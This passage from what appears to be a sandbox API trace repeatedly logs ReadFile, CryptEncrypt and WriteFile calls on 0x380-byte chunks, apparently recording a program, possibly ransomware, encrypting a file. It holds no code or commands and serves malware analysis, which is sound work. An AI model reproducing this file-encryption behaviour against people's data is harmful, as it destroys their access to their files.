lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.379] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.379] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.379] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.379] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.379] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.379] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.379] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.379] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.379] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.380] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.380] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.380] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.380] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.380] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.380] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.381] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.381] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.381] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.381] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.381] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.382] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.382] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.382] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.382] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.382] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.382] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.382] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.382] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.382] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.383] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.383] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.383] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.383] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.383] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.383] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.384] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.384] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.384] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.384] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.384] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.384] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.384] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.384] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.384] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.384] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.384] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.384] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.384] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.385] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.385] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.385] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.385] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.385] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.385] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.385] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.385] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.385] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.385] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.386] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.386] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.386] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, 